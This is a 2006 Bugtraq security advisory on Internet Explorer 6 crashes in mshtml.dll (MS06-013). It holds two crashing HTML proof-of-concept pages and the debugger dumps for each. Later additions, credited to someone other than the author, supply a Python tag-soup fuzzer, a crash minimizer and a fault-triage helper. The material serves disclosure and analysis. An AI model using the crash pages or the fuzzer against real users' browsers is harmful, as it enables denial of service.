Bugtraq mailing list archives
[BuHa-Security] MS06-013: HTML Tag Memory Corruption Vulnerability in MS IE 6 SP2
From: bugtraq () morph3us org
Date: 25 May 2006 22:52:55 -0000
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

---------------------------------------------------
| BuHa Security-Advisory #13         May 25th, 2006 |
---------------------------------------------------
| Vendor  | MS Internet Explorer 6.0              |
| URL     | http://www.microsoft.com/windows/ie/  |
| Version | <= 6.0.2900.2180.xpsp_sp2             |
| Risk    | Critical (Memory Corruption)          |
---------------------------------------------------

The Microsoft Security Response Center rated the following issues as critical
because, on the face of it, they could produce an exploitable memory corruption
(see HTML Tag Memory Corruption Vulnerability - CVE-2006-1188 [1]) with a
variant of my PoC.

o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser made by
Microsoft and currently available as part of Microsoft Windows. Visit
http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Memory Corruption Vulnerability: <mshtml.dll>#7d519030
=================================

The following HTML code forces IE 6 to crash:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<fieldset> <h4> <pre><td> <menu> <legend> <a> <ul> <small> <fieldset> <h6>
</h6 </u> </optgroup> </tr> </map>
</ul </dfn> </del> </h2> </dir> </ul>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html

These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 edi=00000004
eip=7d519030 esp=0012e780 ebp=0012e894

7d519012 55              push    ebp
7d519013 8bec            mov     ebp,esp
7d519015 8b4104          mov     eax,[ecx+0x4]
7d519018 394508          cmp     [ebp+0x8],eax
7d51901b 7c09            jl      mshtml+0x69026 (7d519026)
7d51901d 7edc            jle     mshtml+0x68ffb (7d518ffb)
7d51901f 33c0            xor     eax,eax
7d519021 40              inc     eax
7d519022 5d              pop     ebp
7d519023 c20800          ret     0x8
7d519026 83c8ff          or      eax,0xffffffff
7d519029 ebf7            jmp     mshtml+0x69022 (7d519022)
7d51902b 90              nop
7d51902c 90              nop
7d51902d 90              nop
7d51902e 90              nop
7d51902f 90              nop
FAULT ->7d519030 8b4108  mov     eax,[ecx+0x8] ds:0023:00000008=????????
7d519033 85c0            test    eax,eax
7d519035 7425            jz      mshtml+0x6905c (7d51905c)
7d519037 8b10            mov     edx,[eax]
7d519039 f6c210          test    dl,0x10
7d51903c 7408            jz      mshtml+0x69046 (7d519046)
7d51903e f6c220          test    dl,0x20
7d519041 7519            jnz     mshtml+0x6905c (7d51905c)
7d519043 8b400c          mov     eax,[eax+0xc]
7d519046 8b4808          mov     ecx,[eax+0x8]
7d519049 85c9            test    ecx,ecx
o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35
=================================

The following HTML code forces IE 6 to crash:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
 "http://www.w3.org/TR/html4/loose.dtd">
<bdo> </span> <pre> <param> <form> <colgroup> <small> </small> </colgroup>
</map> </button>
</code <blockquote> <th> <small> </tbody> </tr> </ol> </tbody> </ol> </code>
</strong> <head> <fieldset> <style>
</style </dir> </a>
</td </li>
</label </object>
</bdo </th </object </q> <ol> <object>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html

These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 edi=00000002
eip=7d529d35 esp=0012e778 ebp=0012e778

7d529d0e e811170000      call    mshtml+0x7b424 (7d52b424)
7d529d13 85c0            test    eax,eax
7d529d15 0f85c5500800    jne     mshtml!DllGetClassObject+0x10fa2 (7d5aede0)
7d529d1b 0fb65508        movzx   edx,byte ptr [ebp+0x8]
7d529d1f 8d849680000000  lea     eax,[esi+edx*4+0x80]
7d529d26 5e              pop     esi
7d529d27 5d              pop     ebp
7d529d28 c20c00          ret     0xc
7d529d2b 90              nop
7d529d2c 90              nop
7d529d2d 90              nop
7d529d2e 90              nop
7d529d2f 90              nop
7d529d30 8bff            mov     edi,edi
7d529d32 55              push    ebp
7d529d33 8bec            mov     ebp,esp
FAULT ->7d529d35 0fbe4114 movsx  eax,byte ptr [ecx+0x14] ds:0023:00000014=??
7d529d39 c1e004          shl     eax,0x4
7d529d3c 0578aa4b7d      add     eax,0x7d4baa78
7d529d41 7410            jz      mshtml+0x79d53 (7d529d53)
7d529d43 8b400c          mov     eax,[eax+0xc]
7d529d46 234508          and     eax,[ebp+0x8]
7d529d49 f7d8            neg     eax
7d529d4b 1bc0            sbb     eax,eax
7d529d4d f7d8            neg     eax
7d529d4f 5d              pop     ebp
7d529d50 c20400          ret     0x4
7d529d53 33c0            xor     eax,eax
7d529d55 ebf8            jmp     mshtml+0x79d4f (7d529d4f)
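The two PoC documents above have the shape of machine-generated tag soup: start and end tags in random order and nesting, with some end tags left without their closing '>' ('</h6 ', '</code ', '</bdo '). The generator and crash-case reducer below are added here as an example; they are not the author's tool, and nothing in the advisory says how the PoCs were produced. TAGS (harvested from the two PoCs), the tag_soup/render/write_cases/minimize names, the probabilities and the case file naming are all assumptions. The reducer is the step a practitioner wants after a fuzzer hit: it shrinks a crashing document to the tags that still trigger the fault so the crash site can be reasoned about.

```python
import random
from pathlib import Path

# Element names harvested from the two PoCs above. The vocabulary is arbitrary:
# any list of HTML element names can be substituted.
TAGS = [
    "a", "bdo", "blockquote", "button", "code", "colgroup", "del", "dfn", "dir",
    "fieldset", "form", "h2", "h4", "h6", "head", "label", "legend", "li", "map",
    "menu", "object", "ol", "optgroup", "param", "pre", "q", "small", "span",
    "strong", "style", "tbody", "td", "th", "tr", "u", "ul",
]

# Same preamble the first PoC uses.
DOCTYPE = ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
           '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">')


def tag_soup(seed, length=24, p_close=0.5, p_unterminated=0.2):
    """Return `length` tag tokens: start and end tags in random order and depth,
    with a share of the end tags left without their closing '>' ('</h6' in the
    first PoC). Deterministic for a given seed, so a case can be regenerated
    from its file name alone."""
    rng = random.Random(seed)
    tokens = []
    for _ in range(length):
        name = rng.choice(TAGS)
        if rng.random() >= p_close:
            tokens.append(f"<{name}>")
        elif rng.random() < p_unterminated:
            tokens.append(f"</{name}")          # unterminated end tag
        else:
            tokens.append(f"</{name}>")
    return tokens


def render(tokens):
    """Wrap the tokens in the DOCTYPE/<html> preamble, one tag per line."""
    return DOCTYPE + "\n<html>\n" + "\n".join(tokens) + "\n"


def write_cases(outdir, seeds, **kw):
    """Write one case-<seed>.html per seed and return the paths."""
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for seed in seeds:
        path = out / f"case-{seed}.html"
        path.write_text(render(tag_soup(seed, **kw)), encoding="ascii")
        paths.append(path)
    return paths


def minimize(tokens, still_crashes):
    """Greedy one-token-at-a-time reduction of a crashing case. `still_crashes`
    is the oracle: it takes a token list and reports whether the target still
    faults on it (in practice: write the file, load it in the browser under a
    debugger, check for an access violation). Returns a list from which no
    single token can be removed without losing the crash."""
    tokens = list(tokens)
    changed = True
    while changed:
        changed = False
        i = 0
        while i < len(tokens):
            candidate = tokens[:i] + tokens[i + 1:]
            if still_crashes(candidate):
                tokens = candidate
                changed = True
            else:
                i += 1
    return tokens


if __name__ == "__main__":
    # Write 100 cases under ./cases. Open each in the target browser under a
    # debugger; feed any case that faults to minimize() with an oracle that
    # re-runs the browser on the reduced document.
    for path in write_cases("cases", range(100)):
        print(path)
```

The reducer is deliberately the simple linear variant rather than full delta debugging: each oracle call means a browser launch, and for documents of a few dozen tags the number of launches is small enough that simplicity wins.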
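Reading the two register dumps above by hand is error prone, and the question a triager needs answered first is whether the faulting access goes through a NULL pointer or a wild one. The helper below is added here as an example (it is not part of the advisory or the author's tooling): it recomputes the effective address of the FAULT instruction from the register line, checks it against the ds:0023:... address the debugger printed, and classifies the fault. The sample input is the register lines and FAULT lines of both dumps, copied from the advisory with the surrounding instructions trimmed. The 0x10000 "near-NULL" threshold is an assumption based on the lowest 64 KB of a Win32 process never being mapped; the thiscall reading of ecx is the usual MSVC convention.

```python
import re

# Sample input: the register lines and FAULT line of each dump above, copied
# from the advisory (neighbouring instructions trimmed).
DUMP_7D519030 = """\
eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 edi=00000004
eip=7d519030 esp=0012e780 ebp=0012e894
7d51902f 90              nop
FAULT ->7d519030 8b4108  mov     eax,[ecx+0x8] ds:0023:00000008=????????
7d519033 85c0            test    eax,eax
"""

DUMP_7D529D35 = """\
eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 edi=00000002
eip=7d529d35 esp=0012e778 ebp=0012e778
7d529d33 8bec            mov     ebp,esp
FAULT ->7d529d35 0fbe4114 movsx  eax,byte ptr [ecx+0x14] ds:0023:00000014=??
7d529d39 c1e004          shl     eax,0x4
"""

REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})\b")
FAULT_RE = re.compile(
    r"FAULT ->(?P<eip>[0-9a-f]{8})\s+(?P<bytes>[0-9a-f]+)\s+(?P<mnem>\w+)\s+"
    r"(?P<ops>.+?)\s+ds:[0-9a-f]{4}:(?P<ea>[0-9a-f]{8})="
)
# Intel-syntax memory operand: [base], [base+0xNN], [base+index*scale+0xNN]
MEM_RE = re.compile(
    r"\[(?P<base>e[a-z]{2})(?:\+(?P<index>e[a-z]{2})\*(?P<scale>[1248]))?"
    r"(?:\+0x(?P<disp>[0-9a-f]+))?\]"
)

NULL_PAGE_LIMIT = 0x10000   # assumption: lowest 64 KB of a Win32 process is never mapped


def parse_registers(dump):
    return {name: int(value, 16) for name, value in REG_RE.findall(dump)}


def triage(dump):
    regs = parse_registers(dump)
    fault = FAULT_RE.search(dump)
    if fault is None:
        raise ValueError("no FAULT line in dump")
    ops = fault.group("ops")
    mem = MEM_RE.search(ops)
    if mem is None:
        raise ValueError(f"faulting operand is not a memory reference: {ops}")

    base = regs[mem.group("base")]
    ea = base
    if mem.group("index"):
        ea += regs[mem.group("index")] * int(mem.group("scale"))
    disp = int(mem.group("disp") or "0", 16)
    ea = (ea + disp) & 0xFFFFFFFF

    reported = int(fault.group("ea"), 16)
    if ea != reported:
        raise ValueError(f"computed EA {ea:#010x} disagrees with debugger {reported:#010x}")

    # First operand in Intel syntax is the destination: memory there means a write.
    access = "write" if "[" in ops.split(",")[0] else "read"
    return {
        "eip": int(fault.group("eip"), 16),
        "instruction": f"{fault.group('mnem')} {ops}",
        "access": access,
        "base": mem.group("base"),
        "base_value": base,
        "displacement": disp,
        "ea": ea,
        "near_null": ea < NULL_PAGE_LIMIT,
        # MSVC thiscall passes the object pointer in ecx: base ecx == 0 means a
        # method ran on a NULL object. A near-NULL read is a DoS unless the
        # pointer or the displacement is attacker-influenced.
        "null_this": mem.group("base") == "ecx" and base == 0,
    }


def report(dump):
    t = triage(dump)
    kind = "near-NULL" if t["near_null"] else "wild"
    return (f"{t['eip']:#010x}: {t['instruction']} -> {t['access']} at {t['ea']:#010x} "
            f"({kind} pointer, {t['base']}={t['base_value']:#010x}+{t['displacement']:#x}"
            f"{', NULL this' if t['null_this'] else ''})")


if __name__ == "__main__":
    for dump in (DUMP_7D519030, DUMP_7D529D35):
        print(report(dump))
```

For both dumps the helper reports a read at ecx+displacement with ecx=0, which is what the advisory's fault addresses 0x00000008 and 0x00000014 already show; a mismatch between the recomputed and the printed address would mean the register line and the FAULT line were taken from different moments and the dump is not trustworthy.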
Note that in both dumps the faulting instruction reads through ecx with
ecx=00000000: the access-violation addresses 0x00000008 and 0x00000014 are just
the displacements (+0x8 and +0x14) added to a NULL pointer, and under the MSVC
thiscall convention ecx holds the object (this) pointer, so each crash is a
method executing on a NULL object. As reproduced by the two PoCs the result is
a NULL-pointer read, i.e. a denial of service; the critical rating rests on
Microsoft's assessment that a variant yields exploitable memory corruption.

o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
MS IE 6 SP2 - Win XP Pro SP2
MS IE 6     - Win 2k SP4
o Disclosure Timeline:
=====================

xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.

o Solution:
==========

Install the latest security update (MS06-013) for Internet Explorer [2].

o Credits:
=========

Thomas Waldegger <bugtraq () morph3us org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory, feel free
to send me a mail. The address 'bugtraq () morph3us org' is more a spam address
than a regular mail address, therefore it's possible that some mails get
ignored. Please use the contact details at http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of
BuHa.

Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-2.txt

[1] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188
[2] http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx

- --
Don't you feel the power of CSS Layouts?
BuHa-Security Community: http://buha.info/board/

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEdjSQkCo6/ctnOpYRA9qlAJ9CfZxTO0qAs+6O12hmutZ6eeHoMwCghkd2
vrVBfqAxWpoJ9Ny1W8OAtEw=
=M5nj
-----END PGP SIGNATURE-----